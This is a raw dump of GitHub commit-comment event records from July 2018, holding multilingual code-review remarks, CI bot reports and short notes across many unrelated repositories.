{"id":"7941797275","type":"CommitCommentEvent","actor":{"login":"andrew-bulov"},"repo":{"name":"ElinaValieva/railwayApp"},"payload":{"comment":{"id":29651523,"position":41,"line":65,"path":"src/main/java/com/elina/railwayApp/service/Implementation/TicketServiceImpl.java","commit_id":"ffd109b9ecaba8ef1b1e8f8aa6a0cb0f02cabcde","created_at":"2018-07-10T06:43:39Z","updated_at":"2018-07-10T06:43:39Z","author_association":"NONE","body":"```\r\nкак насчёт такого:\r\n\r\nif(!checkUserUntilBooking(user, schedule)){\r\n throw new BusinessLogicException(ErrorCode.NULL_ELEMENTS.getMessage());\r\n}\r\n  if (checkScheduleForAvailability(schedule)) {\r\nthrow new BusinessLogicException(ErrorCode.TRAIN_WAS_ARRIVED.getMessage());\r\n}\r\nА после всей валидации - основной чистый код\r\n\r\n```"}},"created_at":"2018-07-10T06:43:39Z"}
{"id":"7941805060","type":"CommitCommentEvent","actor":{"login":"DaveyEdwards"},"repo":{"name":"MyiWorlds/myiworlds.frontend"},"payload":{"comment":{"id":29651536,"position":null,"line":null,"path":null,"commit_id":"4cb5f6c1879b87cd378e3e35c1a61d56db92f448","created_at":"2018-07-10T06:45:44Z","updated_at":"2018-07-10T06:45:44Z","author_association":"CONTRIBUTOR","body":"Searches based on words you type it, breaks everything you type down from spaces and commas to search tags on items.  By default it will search and return data that you created, can edit (others shared with you), and content you are on the private viewing list of, as well as all public data matching those tags\r\n![2018-07-09_23-38-38](https://user-images.githubusercontent.com/15203899/42493396-b9675db0-83d1-11e8-92bd-d2ffbc289887.gif)\r\n\r\nThis is forcing re fetches of all the data for the categories you have selected.\r\nIt does not fetch the ones you do not select on the backend\r\n![2018-07-09_23-42-43](https://user-images.githubusercontent.com/15203899/42493421-ce0c059a-83d1-11e8-96d8-3ced2ecf58bc.gif)\r\n\r\nSearch list is usable\r\n![2018-07-09_23-40-14](https://user-images.githubusercontent.com/15203899/42493394-b90a1aa6-83d1-11e8-9f23-4e4a39bc9fe9.gif)"}},"created_at":"2018-07-10T06:45:44Z"}
{"id":"7941805593","type":"CommitCommentEvent","actor":{"login":"jpoon"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":29651537,"position":null,"line":null,"path":null,"commit_id":"59e29c143ab1942715ee27556f63fd57c564b8b5","created_at":"2018-07-10T06:45:53Z","updated_at":"2018-07-10T06:45:53Z","author_association":"MEMBER","body":"Yeah, this makes sense. Wondering if there's a better way for all the logic with the status bar as it's starting to get a lil icky. "}},"created_at":"2018-07-10T06:45:53Z"}
{"id":"7941806202","type":"CommitCommentEvent","actor":{"login":"laosb"},"repo":{"name":"jqqqqqqqqqq/coolq-telegram-bot"},"payload":{"comment":{"id":29651539,"position":null,"line":null,"path":null,"commit_id":"a36a75c4529e53fb7a94f31fb0dc9b3383d40985","created_at":"2018-07-10T06:46:03Z","updated_at":"2018-07-10T06:46:03Z","author_association":"NONE","body":"Please revert this change. Changing License for a GPL-licensed program is considered as a violation of GPL."}},"created_at":"2018-07-10T06:46:03Z"}
{"id":"7941806656","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651543,"position":117,"line":199,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T06:46:10Z","updated_at":"2018-07-10T06:46:10Z","author_association":"CONTRIBUTOR","body":"Sure, makes sense. I'm guessing if caller uses `std::move` it won't break when its a `const &`?"}},"created_at":"2018-07-10T06:46:10Z"}
{"id":"7941807331","type":"CommitCommentEvent","actor":{"login":"aleksandrrusev"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651547,"position":14,"line":14,"path":"Lesson 3/Route.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T06:46:21Z","updated_at":"2018-07-10T06:46:21Z","author_association":"OWNER","body":"Да но так код короче, и мы в любом случаем получим от statins.first / last станцию которая нам необходима по тз, разве нет?"}},"created_at":"2018-07-10T06:46:21Z"}
{"id":"7941808833","type":"CommitCommentEvent","actor":{"login":"Anobisoft"},"repo":{"name":"Anobisoft/AnobiUIKit"},"payload":{"comment":{"id":29651551,"position":null,"line":null,"path":null,"commit_id":"61de9adaecd4b80cc2594906bf3da109fc469248","created_at":"2018-07-10T06:46:46Z","updated_at":"2018-07-10T06:46:46Z","author_association":"OWNER","body":"## AKViewDispatcher\r\n\r\n- bugfix: `observersPoolByViewClass` reinitializing"}},"created_at":"2018-07-10T06:46:46Z"}
{"id":"7941809070","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"enextus/thinknetica"},"payload":{"comment":{"id":29651552,"position":null,"line":null,"path":null,"commit_id":"427a8dc35dc9165a55849ecce7a08222f6622feb","created_at":"2018-07-10T06:46:49Z","updated_at":"2018-07-10T06:46:49Z","author_association":"NONE","body":"- класс `Cards` лучше назвать `Deck` - колода\r\n- конечно же убрать из этого класса все \"путсы\"\r\n- правильно будет создать отдельный класс `Card` из инстансов которого и будет составляться в классе Колода объект колода для игры"}},"created_at":"2018-07-10T06:46:49Z"}
{"id":"7941812106","type":"CommitCommentEvent","actor":{"login":"thuang"},"repo":{"name":"InterPSS-Project/ipss-plugin"},"payload":{"comment":{"id":29651557,"position":1,"line":14,"path":"ipss.plugin.multiNet/src/org/ipss/multiNet/algo/SubNetworkProcessor.java","commit_id":"5bacca5ea0c6a4083578fba5e54824100ea19e3e","created_at":"2018-07-10T06:47:38Z","updated_at":"2018-07-10T06:47:38Z","author_association":"CONTRIBUTOR","body":"@jinjingfarm  I still have 3 errors in this file, associated with addBus() and addBranch(), please help take a look."}},"created_at":"2018-07-10T06:47:38Z"}
{"id":"7941812414","type":"CommitCommentEvent","actor":{"login":"vimalbahuguna"},"repo":{"name":"galvani/plugin-messagebird"},"payload":{"comment":{"id":29651558,"position":2,"line":2,"path":"README.md","commit_id":"2cb485f6d45b4213eb9cefceb85f8f11c019ca77","created_at":"2018-07-10T06:47:43Z","updated_at":"2018-07-10T06:47:43Z","author_association":"NONE","body":"Hi,\r\nIs this plugin tested and working with Mautic 2.13. I tried it with 2.13.1 but it is crashing the whole system?"}},"created_at":"2018-07-10T06:47:43Z"}
{"id":"7941812922","type":"CommitCommentEvent","actor":{"login":"billchenchina"},"repo":{"name":"jqqqqqqqqqq/coolq-telegram-bot"},"payload":{"comment":{"id":29651559,"position":null,"line":null,"path":null,"commit_id":"a36a75c4529e53fb7a94f31fb0dc9b3383d40985","created_at":"2018-07-10T06:47:52Z","updated_at":"2018-07-10T06:47:52Z","author_association":"CONTRIBUTOR","body":"Please revert this change. Changing License for a GPL-licensed program is considered as a violation of GPL."}},"created_at":"2018-07-10T06:47:52Z"}
{"id":"7941813814","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"enextus/thinknetica"},"payload":{"comment":{"id":29651564,"position":null,"line":null,"path":null,"commit_id":"427a8dc35dc9165a55849ecce7a08222f6622feb","created_at":"2018-07-10T06:48:07Z","updated_at":"2018-07-10T06:48:07Z","author_association":"NONE","body":"подозреваю, что ты имел в виду не `Diller`, а  `Dealer`"}},"created_at":"2018-07-10T06:48:07Z"}
{"id":"7941819570","type":"CommitCommentEvent","actor":{"login":"a95saranya"},"repo":{"name":"a95saranya/github-w3tutorial1"},"payload":{"comment":{"id":29651567,"position":null,"line":null,"path":null,"commit_id":"fe6d388c58076af9fce9b4885bfcb0b7ac45c217","created_at":"2018-07-10T06:49:40Z","updated_at":"2018-07-10T06:49:40Z","author_association":"OWNER","body":"change 1"}},"created_at":"2018-07-10T06:49:40Z"}
{"id":"7941819665","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29651568,"position":15,"line":15,"path":"Solutions3/Task1/Car.cs","commit_id":"4f3fcfe1dc2bda120a928ef10ca43dbcba33b182","created_at":"2018-07-10T06:49:42Z","updated_at":"2018-07-10T06:49:42Z","author_association":"NONE","body":"Т.е. есть разные вагоны и не во всех есть 36 мест? Может где-то есть 30 мест, например, да? "}},"created_at":"2018-07-10T06:49:42Z"}
{"id":"7941820000","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651569,"position":13,"line":99,"path":"Source/Foundation/bsfCore/Renderer/BsRenderer.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T06:49:48Z","updated_at":"2018-07-10T06:49:48Z","author_association":"CONTRIBUTOR","body":"Interesting style, I think I like it. The assignment to `complete` within the lambda is an error I assume?"}},"created_at":"2018-07-10T06:49:48Z"}
{"id":"7941820725","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"enextus/thinknetica"},"payload":{"comment":{"id":29651572,"position":null,"line":null,"path":null,"commit_id":"427a8dc35dc9165a55849ecce7a08222f6622feb","created_at":"2018-07-10T06:49:59Z","updated_at":"2018-07-10T06:49:59Z","author_association":"NONE","body":"почему то класс Дилер и Игрок никак не связаны, хотя и по реальным отношениям и по коду они явно родственники... аттрибуты одни и те же (имя, карты, банк)... инишиалайзы почти совпадают... дело пахнет наследованием )"}},"created_at":"2018-07-10T06:49:59Z"}
{"id":"7941823779","type":"CommitCommentEvent","actor":{"login":"yufeiqiang"},"repo":{"name":"yufeiqiang/cici"},"payload":{"comment":{"id":29651576,"position":null,"line":null,"path":null,"commit_id":"99512b91c6f58753292dae3e9007af4497c23959","created_at":"2018-07-10T06:50:45Z","updated_at":"2018-07-10T06:50:45Z","author_association":"OWNER","body":"第二个项目\r\n"}},"created_at":"2018-07-10T06:50:45Z"}
{"id":"7941825059","type":"CommitCommentEvent","actor":{"login":"Yavd3341"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29651579,"position":15,"line":15,"path":"Solutions3/Task1/Car.cs","commit_id":"4f3fcfe1dc2bda120a928ef10ca43dbcba33b182","created_at":"2018-07-10T06:51:07Z","updated_at":"2018-07-10T06:51:07Z","author_association":"OWNER","body":"Да, можно создать вагон с любым количеством мест"}},"created_at":"2018-07-10T06:51:07Z"}
{"id":"7941827645","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651582,"position":24,"line":119,"path":"Source/Foundation/bsfEngine/BsApplication.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T06:51:45Z","updated_at":"2018-07-10T06:51:45Z","author_association":"CONTRIBUTOR","body":"If they fit on one line I prefer using them. I guess this fits that category so I'm not sure why I didn't. I'll make the change."}},"created_at":"2018-07-10T06:51:45Z"}
{"id":"7941829806","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"enextus/thinknetica"},"payload":{"comment":{"id":29651584,"position":null,"line":null,"path":null,"commit_id":"427a8dc35dc9165a55849ecce7a08222f6622feb","created_at":"2018-07-10T06:52:19Z","updated_at":"2018-07-10T06:52:19Z","author_association":"NONE","body":"ты в нескольких классах используешь \"аттрибут аксессоры\" - это не сильно рекомендуемая практика\r\nчаще всего неправильно, если класс предоставляет возможность прямого изменения своих аттрибутов\r\nправильней это делать через методы\r\nвспомни Поезд с его скоростью \r\nскорость меняется не с помощью акссессора, а с помощью методов"}},"created_at":"2018-07-10T06:52:19Z"}
{"id":"7941830593","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29651586,"position":27,"line":35,"path":"src/main/java/movierent/controller/MovieController.java","commit_id":"cceae6d03f3b3fb3f7c30b853911a0a39976404d","created_at":"2018-07-10T06:52:31Z","updated_at":"2018-07-10T06:52:31Z","author_association":"NONE","body":"typo"}},"created_at":"2018-07-10T06:52:31Z"}
{"id":"7941832323","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651587,"position":22,"line":22,"path":"src/opentracing/Tracer.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-10T06:52:58Z","updated_at":"2018-07-10T06:52:58Z","author_association":"NONE","body":"👍 Instead of `_getSpan`, added `getActiveSpan` method."}},"created_at":"2018-07-10T06:52:58Z"}
{"id":"7941832853","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/simplehashtable"},"payload":{"comment":{"id":29651588,"position":null,"line":null,"path":null,"commit_id":"b9c79b3612942f2966b3166441d4466a0cfe0507","created_at":"2018-07-10T06:53:06Z","updated_at":"2018-07-10T06:53:06Z","author_association":"OWNER","body":"I whipped this up pretty quickly, but it works and is memory-safe."}},"created_at":"2018-07-10T06:53:06Z"}
{"id":"7941837099","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"enextus/thinknetica"},"payload":{"comment":{"id":29651596,"position":null,"line":null,"path":null,"commit_id":"427a8dc35dc9165a55849ecce7a08222f6622feb","created_at":"2018-07-10T06:54:12Z","updated_at":"2018-07-10T06:54:12Z","author_association":"NONE","body":"и как дополнение к предыдущему комментарию )\r\nоперации с деньгами лучше перепоручить классу Банк, а не лазать в кошельки игроков напрямую, как ты сделал с помощью аксессора"}},"created_at":"2018-07-10T06:54:12Z"}
{"id":"7941840163","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651605,"position":30,"line":375,"path":"Source/Foundation/bsfEngine/Renderer/BsRendererUtility.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T06:54:58Z","updated_at":"2018-07-10T06:54:58Z","author_association":"CONTRIBUTOR","body":"Would probably benefit from it, but for now its too much code to change to support it. I might do a refactor later."}},"created_at":"2018-07-10T06:54:58Z"}
{"id":"7941841414","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/simplehashtable"},"payload":{"comment":{"id":29651613,"position":null,"line":null,"path":null,"commit_id":"71dc89e80204aa9b0864eaac73d393adab496531","created_at":"2018-07-10T06:55:17Z","updated_at":"2018-07-10T06:55:17Z","author_association":"OWNER","body":"I put those in thinking they would be necessary. They aren't, I think because of the (void *) type. Typecasting is only needed for storing non-pointers, it would seem."}},"created_at":"2018-07-10T06:55:17Z"}
{"id":"7941842501","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29651625,"position":null,"line":null,"path":null,"commit_id":"57244f330766708e6ed63b51ed34f06a6e43bd46","created_at":"2018-07-10T06:55:34Z","updated_at":"2018-07-10T06:55:34Z","author_association":"COLLABORATOR","body":"Puzzle `1080-e7775be0` disappeared from [`src/test/java/com/zerocracy/tk/profile/TkProfileTest.java`](https://github.com/zerocracy/farm/blob/master/src/test/java/com/zerocracy/tk/profile/TkProfileTest.java), that's why I closed #1142. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-10T06:55:34Z"}
{"id":"7941843737","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29651629,"position":null,"line":null,"path":null,"commit_id":"57244f330766708e6ed63b51ed34f06a6e43bd46","created_at":"2018-07-10T06:55:54Z","updated_at":"2018-07-10T06:55:54Z","author_association":"COLLABORATOR","body":"Puzzle `1142-5773798e` discovered in   [`src/test/java/com/zerocracy/tk/View.java`](  https://github.com/zerocracy/farm/blob/master/src/test/java/com/zerocracy/tk/View.java)   and submitted as #1399. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T06:55:54Z"}
{"id":"7941847411","type":"CommitCommentEvent","actor":{"login":"Christydeng"},"repo":{"name":"Christydeng/var-and-let"},"payload":{"comment":{"id":29651639,"position":null,"line":null,"path":null,"commit_id":"992ff4651c9ce91e611e03fab1c42f838bf22cb9","created_at":"2018-07-10T06:56:51Z","updated_at":"2018-07-10T06:56:51Z","author_association":"OWNER","body":"作者：知乎用户\r\n链接：https://www.zhihu.com/question/47456978/answer/106069482\r\n来源：知乎\r\n著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。\r\n\r\n作用域更加清晰不存在变量作用域自动提升的问题造成变量值被覆盖的问题，例如：let a = 1;\r\nvar b = 1;\r\nif (true) {\r\n  let a = 2;\r\n  var b = 2;\r\n}\r\nconsole.log(a) // a is 1\r\nconsole.log(b) // b is 2\r\n作用域更容易控制let 的作用域是根据代码块（enclosing block）来判定的，而 var 的作用域是根据函数块（function block）来判定的。这样的话，如果我们的变量都使用 let/const 来声明，那么以前的立即执行函数就不需要了，我们只要加一个代码块就好了，例如：{\r\n  let a = 1;\r\n}\r\nconsole.log(a) //  a is not defined\r\nRuntime自动检查重复声明的函数并报错在同一个作用域内不允许重复声明变量，例如：if (true) {\r\n  let a = 1;\r\n  let a = 2;\r\n}\r\nRuntime会报错：Uncaught SyntaxError: Identifier 'a' has already been declared有了更加清晰的作用域，我们的代码就能够更好被预测，也更好维护。有了更容易控制的作用域可以让我们减少很多立即执行的函数。Runtime的自动检查可以避免不必要，甚至是错误的代码声明。"}},"created_at":"2018-07-10T06:56:51Z"}
{"id":"7941848918","type":"CommitCommentEvent","actor":{"login":"fordp2002"},"repo":{"name":"d99kris/rapidcsv"},"payload":{"comment":{"id":29651642,"position":null,"line":null,"path":null,"commit_id":"a00526d56d86e9faf771801dbafe494443f72309","created_at":"2018-07-10T06:57:14Z","updated_at":"2018-07-10T06:57:14Z","author_association":"NONE","body":"Thanks that is great!"}},"created_at":"2018-07-10T06:57:14Z"}
{"id":"7941851652","type":"CommitCommentEvent","actor":{"login":"brusch"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29651646,"position":null,"line":null,"path":null,"commit_id":"2c24923c5a011f767e3894c3a6c0cf5238332d73","created_at":"2018-07-10T06:57:57Z","updated_at":"2018-07-10T06:57:57Z","author_association":"MEMBER","body":"ok - changed it to 768mb, that fixed it ;-) "}},"created_at":"2018-07-10T06:57:57Z"}
{"id":"7941856310","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29651668,"position":15,"line":15,"path":"Solutions3/Task1/Car.cs","commit_id":"4f3fcfe1dc2bda120a928ef10ca43dbcba33b182","created_at":"2018-07-10T06:59:08Z","updated_at":"2018-07-10T06:59:08Z","author_association":"NONE","body":"А, ты так сделал\r\nНууу, это не совсем корректно, в вагонах фиксированное кол-во мест обычно, отличаются места только по типу вагона, например, плацкарт - 54 места, купе - 36, в люксе ещё меньше, вроде, 18\r\nТогда сделай поле Тип вагона и Кол-во мест, а на это всё отдельный интерфейс Wagon, а потом три разных класса и каждый со своим кол-вом мест внутри, без конструктора, который принимает это кол-во мест"}},"created_at":"2018-07-10T06:59:08Z"}
{"id":"7941856549","type":"CommitCommentEvent","actor":{"login":"xuanjha"},"repo":{"name":"xuanjha/learngit"},"payload":{"comment":{"id":29651670,"position":null,"line":null,"path":null,"commit_id":"ebe1dca4fe33ba8cd449c6fd5f4907ca323956a9","created_at":"2018-07-10T06:59:11Z","updated_at":"2018-07-10T06:59:11Z","author_association":"OWNER","body":"learn to github"}},"created_at":"2018-07-10T06:59:11Z"}
{"id":"7941857084","type":"CommitCommentEvent","actor":{"login":"Buuhuu"},"repo":{"name":"Buuhuu/frontend-maven-plugin"},"payload":{"comment":{"id":29651674,"position":56,"line":56,"path":"frontend-plugin-core/src/main/java/com/github/eirslett/maven/plugins/frontend/lib/ArgumentsParser.java","commit_id":"9de83f393f5f63d3cd474dec5a0e10e7b4d1ece7","created_at":"2018-07-10T06:59:19Z","updated_at":"2018-07-10T06:59:19Z","author_association":"OWNER","body":"Thanks. I addressed this in c71b090600ee3f4322b51da8456ea16c0961283a."}},"created_at":"2018-07-10T06:59:19Z"}
{"id":"7941859156","type":"CommitCommentEvent","actor":{"login":"xuanjha"},"repo":{"name":"xuanjha/learngit"},"payload":{"comment":{"id":29651679,"position":null,"line":null,"path":null,"commit_id":"ebe1dca4fe33ba8cd449c6fd5f4907ca323956a9","created_at":"2018-07-10T06:59:49Z","updated_at":"2018-07-10T06:59:49Z","author_association":"OWNER","body":"learn github."}},"created_at":"2018-07-10T06:59:49Z"}
{"id":"7941859597","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/govcraft"},"payload":{"comment":{"id":29651682,"position":null,"line":null,"path":null,"commit_id":"562743f94487d8a8ae17e786480edec619b804f4","created_at":"2018-07-10T06:59:56Z","updated_at":"2018-07-10T06:59:56Z","author_association":"CONTRIBUTOR","body":"수고 많으셨네요. dedicated_agents를 검색해서 보여주는 건 이해가지 않네요. 이미 연결된 대상을 검색한 결과로 보여주는 이유는 뭘까요? 넘겨짚기에 \"현재 촉구대상\"에 표시되는게 모자라서 그런 것이라 생각되는데요. @searched_agents는 그 영역에 표시되는 것이 아닙니다."}},"created_at":"2018-07-10T06:59:56Z"}
{"id":"7941861887","type":"CommitCommentEvent","actor":{"login":"tfg2817"},"repo":{"name":"tfg2817/hello-world"},"payload":{"comment":{"id":29651696,"position":null,"line":null,"path":null,"commit_id":"6c3e698dbdd41dd0cd67a72cc63591625886fe66","created_at":"2018-07-10T07:00:26Z","updated_at":"2018-07-10T07:00:26Z","author_association":"OWNER","body":"#hello world\r\n"}},"created_at":"2018-07-10T07:00:26Z"}
{"id":"7941863227","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/govcraft"},"payload":{"comment":{"id":29651698,"position":null,"line":null,"path":null,"commit_id":"562743f94487d8a8ae17e786480edec619b804f4","created_at":"2018-07-10T07:00:44Z","updated_at":"2018-07-10T07:00:44Z","author_association":"CONTRIBUTOR","body":"그리고 dedicated_agents가 해당 캠페인에 연결된 모든 agent는 아니랍니다. 에이전시를 통해 연결된 경우도 있습니다."}},"created_at":"2018-07-10T07:00:44Z"}
{"id":"7941863270","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29651699,"position":null,"line":null,"path":null,"commit_id":"e8275ee29b06e2884b68f262e9bb085b7efdc673","created_at":"2018-07-10T07:00:45Z","updated_at":"2018-07-10T07:00:45Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-10T07:00:45Z"}
{"id":"7941863800","type":"CommitCommentEvent","actor":{"login":"laszlocsomor"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29651701,"position":15,"line":736,"path":"src/test/java/com/google/devtools/build/android/AarGeneratorActionTest.java","commit_id":"f0f5d101ddac1bce16b49fce828e85096c24bbfd","created_at":"2018-07-10T07:00:52Z","updated_at":"2018-07-10T07:00:52Z","author_association":"CONTRIBUTOR","body":"Good point! Yes, it'd be safer to do so. Thanks for pointing this out!"}},"created_at":"2018-07-10T07:00:52Z"}
{"id":"7941865902","type":"CommitCommentEvent","actor":{"login":"duanjp8617"},"repo":{"name":"duanjp8617/cswitch"},"payload":{"comment":{"id":29651705,"position":null,"line":null,"path":null,"commit_id":"5a911945194065f0a44eb50873295a59eaba00b9","created_at":"2018-07-10T07:01:20Z","updated_at":"2018-07-10T07:01:20Z","author_association":"OWNER","body":"the l2_parser uses memory copy!"}},"created_at":"2018-07-10T07:01:20Z"}
{"id":"7941872332","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29651726,"position":null,"line":null,"path":null,"commit_id":"e8275ee29b06e2884b68f262e9bb085b7efdc673","created_at":"2018-07-10T07:02:53Z","updated_at":"2018-07-10T07:02:53Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T07:02:53Z"}
{"id":"7941873696","type":"CommitCommentEvent","actor":{"login":"PavelVais"},"repo":{"name":"PavelVais/RecruitisAPI"},"payload":{"comment":{"id":29651728,"position":null,"line":null,"path":null,"commit_id":"1cb7b14075133d6bb56f9ff7e78b33f93f31c84b","created_at":"2018-07-10T07:03:13Z","updated_at":"2018-07-10T07:03:13Z","author_association":"OWNER","body":"__API Description file syntax error on line 1__: expected API name, e.g. '# <API Name>' (Autogenerated message from apiary.io)"}},"created_at":"2018-07-10T07:03:13Z"}
{"id":"7941874969","type":"CommitCommentEvent","actor":{"login":"nlubisch"},"repo":{"name":"MacGyver-NRW/oc-server3"},"payload":{"comment":{"id":29651731,"position":16,"line":16,"path":"htdocs/deleteuser.php","commit_id":"072de8bb05501f28b7ddf5d5443876efc16a4f6c","created_at":"2018-07-10T07:03:33Z","updated_at":"2018-07-10T07:03:33Z","author_association":"COLLABORATOR","body":"auf int casten"}},"created_at":"2018-07-10T07:03:33Z"}
{"id":"7941876081","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651733,"position":1,"line":93,"path":"Source/Foundation/bsfUtility/String/BsStringID.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T07:03:51Z","updated_at":"2018-07-10T07:03:51Z","author_association":"CONTRIBUTOR","body":"cstr() I think because I was trying to avoid underscores since I don't use them in method names anywhere else in the codebase. But in this case I think it's worth breaking the rule.\r\n\r\nAre you sure about explicit template instantiation? Since I'm able to use StringID from other libraries (i.e. plugins) and `construct` and `calcHash` methods are only defined in the .cpp file it feels like they are used correctly by external code? Or perhaps I'm misunderstanding what you're saying.\r\n\r\nSounds good about a generic version of string operations."}},"created_at":"2018-07-10T07:03:51Z"}
{"id":"7941885053","type":"CommitCommentEvent","actor":{"login":"sechel"},"repo":{"name":"sopherio/nchan"},"payload":{"comment":{"id":29651759,"position":10,"line":851,"path":"src/util/nchan_util.c","commit_id":"ee1f260ce07dc283ddabae2a3f32b969d9ddb51c","created_at":"2018-07-10T07:05:59Z","updated_at":"2018-07-10T07:05:59Z","author_association":"MEMBER","body":"@neben I would always insert breaks after each case. Otherwise you'll forget to add it if you add further cases below."}},"created_at":"2018-07-10T07:05:59Z"}
{"id":"7941885094","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651760,"position":24,"line":26,"path":"Source/Foundation/bsfCore/Particles/BsParticleModule.h","commit_id":"d1cc9123798ea88413c5525d3bfddc711585c579","created_at":"2018-07-10T07:06:00Z","updated_at":"2018-07-10T07:06:00Z","author_association":"CONTRIBUTOR","body":"Yeah. It's the only part of this struct that isn't general purpose and used by all emitter/evolver types. I assume there's going to be other similar data in the future."}},"created_at":"2018-07-10T07:06:00Z"}
{"id":"7941885936","type":"CommitCommentEvent","actor":{"login":"billchenchina"},"repo":{"name":"jqqqqqqqqqq/coolq-telegram-bot"},"payload":{"comment":{"id":29651763,"position":null,"line":null,"path":null,"commit_id":"a36a75c4529e53fb7a94f31fb0dc9b3383d40985","created_at":"2018-07-10T07:06:12Z","updated_at":"2018-07-10T07:06:12Z","author_association":"CONTRIBUTOR","body":"@laosb See #46 "}},"created_at":"2018-07-10T07:06:12Z"}
{"id":"7941894424","type":"CommitCommentEvent","actor":{"login":"farhanzahid01"},"repo":{"name":"farhanzahid01/Assignment-1"},"payload":{"comment":{"id":29651779,"position":null,"line":null,"path":null,"commit_id":"0e7e2a976b90dc7f7b28c11e0d0d0ea325998135","created_at":"2018-07-10T07:08:16Z","updated_at":"2018-07-10T07:08:16Z","author_association":"OWNER","body":"Project has been started on 10/07/2018"}},"created_at":"2018-07-10T07:08:16Z"}
